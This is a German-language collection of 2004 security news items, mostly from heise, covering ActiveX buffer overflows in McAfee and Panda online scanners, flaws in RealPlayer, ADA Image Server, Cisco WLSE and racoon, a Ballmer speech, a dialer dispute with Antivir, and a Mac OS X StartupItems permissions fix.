Rafel Ivgi hat zwei weitere Security Advisories veröffentlicht, in denen er ähnliche Fehler bei McAfee und Panda beschreibt, wie er sie schon in Symantecs ActiveX-Controls gefunden hat. Bei McAfees Online-Dienst Freescan ist das ActiveX-Objekt "McFreeScan.CoMcFreeScan.1" Schuld, bei dem sehr lange Scan-Parameter den Stack überschreiben können. Zusätzlich verrät die Funktion einige Pfadnamen, unter anderem solche, in denen der Benutzername (Dokumente und Einstellungen) angegeben ist. Eine manipulierte Webseite, die das Control aufruft, kann damit Informationen über das Zielsystem für weitergehende Angriffe sammeln.

Bei Pandas ActiveScan liegt der Fehler im Control "ascontrol.dll". Ein Objekt zur Definition der Sprache erzeugt bei Parametern mit mehr als 255 Zeichen einen Pufferüberlauf. Sowohl bei McAfee als auch bei Panda lassen sich die Fehler lokal und über Webseiten ausnutzen. Die in den Advisories gezeigten Demo-Exploits führen nur zum Absturz der verwundbaren Controls. Prinzipiell kann ein Angreifer damit aber auch eigenen Code auf das System schreiben und starten, nach Angaben von Ivgi bei Pandas Controls sogar im System-Kontext.

Ob die Hersteller bereits über das Problem informiert sind, gibt Ivgi in seinen Advisories nicht an. Obwohl er sie erst heute auf der Mailing-Liste Full Disclosure veröffentlicht hat, sind sie bereits einige Tage alt. Anwender sollten die verwundbaren Controls unter C:\Windows\Downloaded Program Files\ deinstallieren und ActiveX deaktivieren.

Mit der Problematik unsicherer ActiveX-Controls befasst sich auch der aktuelle Kommentar auf heise Security: (Un-)Sicheres ActiveX, die Xte

Siehe dazu auch:

• Security Advisory zu McAfee Freescan von Rafel Ivgi
• Security Advisory zu Panda ActiveScan von Rafel Ivgi
• Buffer Overflow in Symantecs Online-Virenscanner auf heise Securiy

http://www.heise.de/security/news/meldung/46355



#####


Schwachstelle in RealPlayer



RealNetworks hat eine Meldung veröffentlicht, die vor einer Schwachstelle im RealPlayer warnt, mit der Angreifer bösartigen Code in verwundbare Systeme schleusen können. Ein Plug-in zum Abspielen von R3T-Media-Dateien provoziert durch einen nicht näher beschriebenen Fehler einen Buffer Overflow. Das Plug-in ist standardmäßig nicht im RealPlayer enthalten.

Betroffen sind RealPlayer 8, RealOne Player, RealOne Player v2 für Windows, RealPlayer 10 Beta (nur Englisch) und ReaPlayer Enterprise nur dann, wenn der Anwender das R3T-Plug-in heruntergeladen und installiert hat. Der Hersteller hat reagiert und Updates zur Verfügung gestellt, die das fehlerhafte Modul entfernen. Der Fehler ist in der heute erschienenen finalen Version des RealPlayer 10 ebenfalls beseitigt -- bei Installation der neuen RealPlayer-Version wird das betroffene Modul einfach entfernt.

Siehe dazu auch:

• Security Advisory von RealNetworks

http://www.heise.de/security/news/meldung/46360

ADA Image Server – Pufferüberlauf und unzulässiger Verzeichniswechsel



[Serverprogramme] (http://www.tecchannel.de/sicherheit/reports/2547.html) Es werden zwei Schwachstellen im ADA Image Server gemeldet, über die ein Angreifer das System kompromittieren oder an sensitive Informationen gelangen kann.

Ein ungeprüfter Puffer in der Routine zur Verarbeitung des HTTP-Requests lässt sich mittels eines überlangen (etwa 292 Byte) HTTP-GET-Requests ausnutzen, um einen Pufferüberlauf zu verursachen. Ein erfolgreicher Angriff erlaubt das Ausführen beliebigen Codes.

Ein Fehler bei der Überprüfung von Eingaben, lässt sich ausnutzen, Verzeichnisse außerhalb des Web-Root auszulesen, indem die URL eine kodierte Variante der normalen Zeichenfolge "..//" enthält. Diese Lücke kann in Kombination mit einer kürzlich entdeckten Schwachstelle dazu verwendet werden, beliebige Verzeichnisse auszulesen. Die Lücken sind bestätigt in Version 0.4 für Windows. Andere Versionen können ebenso betroffen sein.

http://www.rotalarm.de/


####

Microsoft organisiert Sicherheits-Schulungen



Microsoft veranstaltet bis Juni in 20 US-Städten kostenlose so genannte "Security Summits". Auf diesen eintägigen Kursen sollen Sicherheitsexperten den IT-Verantwortlichen und Entwicklern praktische Ratschläge zur Verbesserung der IT-Sicherheit geben.

Das Angebot besteht aus vierteiligen Kursen, die für "IT-Professionals" in zwei Varianten je nach Aufgabenbereich aufgeteilt sind, umfassen Themen wie die Absicherung der Infrastruktur, das Patch-Management und die zentrale Verwaltung von Anmelde- und Zugriffsrechten.

Für Entwickler liegen die Schwerpunkte auf der Vermeidung von Sicherheitslecks wie Buffer Overruns, Probleme mit Skriptsprachen und SQL-Attacken bei Datenbanken. Kryptographie und der Einsatz von Tools zum Aufspüren von Sicherheitslöchern u. a. für das .NET-Framework stehen ebenfalls auf dem Programm.

Zur Reisegruppe gehören 13 hochrangige Microsoft-Mitarbeiter, darunter die drei Vizepräsidenten Mike Nash, Chef der "Security Business Unit", Brian Valentine, Herr der Windows-Betriebssysteme und Richard Kaplan, zuständig für die "Content Development and Delivery Group" sowie der oberste Stratege für "Trustworthy Computing", Scott Charney.

Auch in Deutschland bietet Microsoft eintägige Sicherheitstrainings für IT-Professionals an -- allerdings ohne prominente Beteiligung. Das Programm reicht hier von der Internetverbindungsfirewall über Windows-Update-Services bis hin zum Absichern von Servern.


http://www.heise.de/security/news/meldung/46393


#####

Cisco-Produkte mit fest programmiertem Name-Passwort-Paar



Cisco hat ein Security Advisory herausgegeben, das auf ein fest in der Software einprogrammiertes Name-Passwort-Paar in der Wireless LAN Solution Engine (WLSE) und der Hosting Solution Engine (HSE) hinweist. Angreifer können mit Kenntnis dieser Anmeldedaten unautorisiert mit vollen Rechten auf das System zugreifen und die Konfiguration ändern oder neue Benutzer anlegen. Das Benutzerkonto lässt sich nicht deaktivieren. Wie die Name-Passwort-Kombination lautet, hat Cisco nicht veröffentlicht.

Betroffen sind WLSE 2.0, 2.0.2 und 2.5 sowie HSE 1.7, 1.7.1, 1.7.2 und 1.7.3. Ein Workaround zur Beseitigung des Problems gibt es nach Angaben von Cisco nicht. Der Hersteller empfiehlt Anwendern dringend, die verfügbaren Patches für WLSE und HSE einzuspielen (Zugriff nur für registrierte Kunden).

CiscoWorks WLSE bietet ein zentralisiertes Management zur Verwaltung und Überwachung von Cisco-WLAN-Infrastrukturen. Die Hosting Solution Engine ist eine Hardware-Lösung zum Netzwerkmanagement.



Siehe dazu auch:

• Security Advisory von Cisco

http://www.heise.de/security/news/meldung/46388


#####

Fehler in VPN-Schlüsselaustausch-Dienst für BSD-Plattformen und Linux



Der IKE-Dienst des KAME-Projektes -- racoon -- überprüft die Authentifizierungsdaten nicht vollständig, wenn RSA-Signaturen zum Einsatz kommen. KAME ist eine freie Referenz-Implementierung von IPv6 und IPSec für verschiedene BSD-Varianten, die auch im Linux-Kernel 2.6 verwendet wird.

Racoon validiert zwar das übermittelte X.509-Zertifikat eines Teilnehmens, die Funktion eay_check_x509sign() im Modul crypto_openssl.c berücksichtigt aber nicht die dazugehörige RSA-Signatur. Unautorisierte Angreifer, die im Besitz eines gültigen und vertrauenswürdigen X.509-Zertifikats sind, können mit beliebigen privaten Schlüsseln RSA-Signaturen erzeugen und in Phase 1 zur erfolgreichen Authentifizierung senden. Nach Angaben von Ralf Spenneberg, Entdecker der Sicherheitslücke, ist kein Exploit notwendig, um den Fehler auszunutzen; racoon selbst eignet sich für solch einen Angriff.

Betroffen sind alle racoon-Versionen, die in den Linux-ipsec-tools bis einschließlich 0.2.4 enthalten sind, beziehungsweise vor dem 6. April 2004 veröffentlicht wurden. Die KAME-Entwickler haben ihr CVS bereits aktualisiert. Auch Gentoo hat schon reagiert und neue Pakete für die ipsec-tools (0.2.5) zur Verfügung gestellt. Ein Workaround existiert nicht.



Siehe dazu auch:

• Security Advisory von Ralf Spenneberg
• IPsec Howto for Linux von Ralf Spenneberg

http://www.heise.de/security/news/meldung/46390

#####

Microsoft-Chef betont Notwendigkeit von mehr IT-Sicherheit



"Es ist absolut grundlegend für unsere gesellschaftliche und ökonomische Zukunft und für unsere öffentliche sowie nationale Sicherheit, dass wir die IT-Infrastruktur stärker absichern", betonte Microsoft-Chef Steve Ballmer in einer Rede auf einer Tagung des Center for Strategic & International Studies zum Thema "Security in an Increasingly Digital World". Dazu gehöre sowohl die stärkere Bekämpfung von Cyber-Kriminellen als auch die bessere Absicherung der Systeme und der Kampf gegen Piraterie. Aber auch Initiativen gegen Spam und die dahinter stehenden Firmen fasst Ballmer unter das Stichwort "Absicherung der IT-Infrastruktur".

Es gebe eine dramatische Steigerung in der Anzahl und der Heftigkeit von Angriffen über das Netz, meinte Ballmer. Microsoft ebenso wie die gesamte Industrie müsse besser mit den Strafverfolgungsbehörden zusammenarbeiten, um die Cyber-Kriminellen dingfest zu machen. Auch müsse die Branche die Computer widerstandsfähiger gegenüber Attacken machen, betonte Ballmer.

Aber die Industrie könne dies alles nicht alleine leisten. Die Regierungen spielten eine wichtige Rolle -- etwa bei der Forschung nach Maßnahmen zur Erhöhung der IT-Sicherheit. Aber auch die Einführung und Anwendung von Gesetzen gegen Cyber-Kriminelle sowie Programme, um bei Anwendern mehr Bewusstsein über notwendige Maßnahmen zur IT-Sicherheit zu schaffen, lägen im Aufgabenbereich der Regierungen. Dies führe auch gleich zur Verantwortung der Nutzer: Sie müssten sich darüber klar werden, dass sie selbst ebenfalls dafür zu sorgen haben, dass die Computersysteme abgesichert werden.

Auch wenn Microsoft-Systeme wegen ihrer großen Marktverbreitung am häufigsten Ziel der Attacken durch Cyber-Kriminelle würden, betreffe die Frage der IT-Sicherheit ohne Unterschied die gesamte Industrie, betonte Ballmer. Bei Microsoft sei die IT-Sicherheit die absolute Top-Priorität, versicherte der Microsoft-Chef erneut. Ein großer Teil des Forschungs- und Entwicklungsbudgets von 7 Milliarden US-Dollar gehe in diesen Bereich, damit die Kunden sowohl am Netz angeschlossen als auch geschützt sein könnten. Dazu gehöre etwa, bösartigen Code zu isolieren, schon bevor er in die Rechner von Anwendern eindringen könne, aber auch, einfache Möglichkeiten zu schaffen, die Software immer mit den neuesten Korrekturen zu versorgen.

Ballmer verwies erneut auf das Service Pack 2 für Windows XP, mit dem Microsoft einige Verbesserungen und Neuerungen für die Sicherheit des Systems einführen werde. Er kündigte aber für die Zukunft neue Techniken an, etwa ein von Microsoft als Active Protection Technology bezeichnetes Unterfangen, das Computer besser gegen besonders ausgefuchste Mail-Würmer und Viren schützen soll. Dazu möchte Microsoft etwa Methoden identifizieren, die in solchen Schädlingen genutzt werden, und Code frühzeitig abfangen, der auf Grund dieser Analysen als gefährlich eingestuft wird. Ein solchermaßen geschützter Rechner werde sich anders verhalten: "Das schaut nicht in Ordnung aus", beschrieb Ballmer die von ihm erhoffte Reaktion solcher Computer, "ich werde das nicht ausführen, ohne den User vorher um Erlaubnis zu fragen."

Ballmer betonte immer wieder, es sei eine Aufgabe aller Beteiligten -- der Sicherheits-Industrie, der Computer-Branche, der Regierungen, der Kunden und der Infrastruktur-Betrieber --, die Computer und das Netz sicherer zu machen. "Wir müssen uns um unsere Computersysteme kümmern wie wir für unsere Transport-Infrastruktur sorgen", zog Ballmer einen Vergleich.


http://www.heise.de/security/news/meldung/46391

Dialer-Anbieter streitet mit Hersteller von Antiviren-Software

Der Dialer-Anbieter Online Ideas hat nach eigenen Angaben Antrag auf Erlass einer einstweiligen Verfügung gegen die Firma H+BEDV Datentechnik gestellt, Hersteller der Antiviren-Software Antivir. Auf eine Abmahnung hatte H+BEDV zuvor nicht reagiert. Demnach soll Antivir Dialer nicht mehr als "gefährlich" anzeigen dürfen. Durch die Dialer-Erkennung und Warnung des kostenlosen Antivirenprogramms sind nach Angaben des Online-Portals dialerschutz.de die Einwahlzahlen mehrerer Betreiber von Dialer-Seiten stark zurückgegangen.

Online Ideas verdient unter anderem auch mit Klingeltönen und Handylogos sein Geld. Die Geschäftsführerin des Dialer-Anbieters kritisierte gegenüber dialerschutz.de, dass Verbraucher zwar vor illegalen Dialern geschützt werden müssen, dies aber nicht dazu führen dürfe, dass von der Regulierungsbehörde für Post und Telekommunikation (RegTP) genehmigte gesetzeskonforme Dialer als "gefährlich" tituliert werden. Außerdem moniert Online Ideas, dass Antivir nicht alle Dialer erkenne, sondern nur die bekannteren Anbieter in der Virendefinitionsliste auftauchen. Zudem dürfe die Einwahl nicht, wie es im Fall Antivir geschehe, nahezu unmöglich gemacht werden.

Wie Antivir-Hersteller H+BEDV auf die rechtlichen Schritte reagieren wird, ist bisher noch nicht klar. Vor zwei Jahren erhielt H+BEDV schon einmal eine Abmahnung eines Dialer-Anbieters und stoppte daraufhin die Dialer-Erkennung von Antivir. Damals wurden Dialer von der Antivirensoftware als Virus tituliert. Heute meldet Antivir bei der Endeckung eines Dialers dagegen ein "kostenverursachendes Einwahlprogramm" -- und der Nutzer kann Dialer anders als damals auch erlauben. (boi/c't)

Quelle: http://www.heise.de/newsticker/meldung/46420

Nachlässige Installer können Sicherheit von Mac OS X schwächen



Anwender von Apples Unix-Betriebssystem Mac OS X haben die Diskussionen um Sicherheitslücken auf Windows-Seite bisher eher gelassen verfolgt. Doch die Sicherheit kann trügerisch sein. Viele Installationsprogramme, die in /Library/StartupItems/ ein so genanntes StartupItem einrichten, scheinen nämlich ein wenig nachlässig bei der Rechtevergabe zu sein.

Ein StartupItem ist nichts weiter als ein Verzeichnis, in dem ein gleichnamiges Shell-Skript (oder ein anderes Programm) und einige Konfigurationsdateien liegen. Der System-Starter von Mac OS X durchsucht beim Systemstart alle Verzeichnisse in /Library/StartupItems/, ob sie den Strukturanforderungen genügen und führt, falls ja, den aktiven Teil aus -- mit root-Rechten. Das ist so vorgesehen und noch nichts Besonderes.

Hat aber nun ein Installer die Rechte eines von ihm angelegten StartupItems so gewählt, dass nicht nur root respektive Mitglieder der Gruppe wheel, sondern auch die Angehörigen der Gruppe admin dort hinein schreiben dürfen, bildet dies eine Schwachstelle. Fast alle Mac-Anwender arbeiten mit dem Benutzerkonto, das Mac OS X bei der Installation anlegt, und das gehört zur Gruppe admin. Führt solch ein Benutzer ein Skript oder Programm aus, etwa bei einer Installation, so muss er nicht einmal sein Passwort eingeben, damit dieses ein StartupItem anlegen kann, das beim nächsten Systemstart mit root-Rechten machen kann, was es will. Bekommt ein gutgläubiger Anwender nun ein bösartiges Programm untergejubelt, sind der Software über diesen Mechanismus Tür und Tor geöffnet. Nicht nur deshalb sollte man nur Programme starten, die aus einer zuverlässigen Quelle stammen.

Unter Mac OS X 10.3 besitzt das Festplatten-Dienstprogramm zwar eine Funktion namens "Volume-Zugriffsrechte reparieren" zur Korrektur fehlgeleiteter Rechte, diese berücksichtigt aber lediglich /Library/StartupItems/ selbst und nicht dessen Inhalt. Um auf Nummer Sicher zu gehen, kann man deshab in einem Terminal



sudo chown -R root:wheel /Library/StartupItems/

eingeben und diesen Befehl mit seinem Administratorpasswort bestätigen. Danach dürfen nur root und die Mitglieder der Gruppe wheel (und das ist standardmäßig nur root) in die StartupItems schreiben. Apple soll bereits am 24. März über das Problem informiert worden sein, bislang aber noch nicht darauf reagiert haben. Wer sich etwas näher mit diesem Sachverhalt beschäftigen möchte: Er wird zur Zeit in der Newsgroup de.comp.sys.mac.misc intensiv diskutiert.

http://www.heise.de/security/news/meldung/46409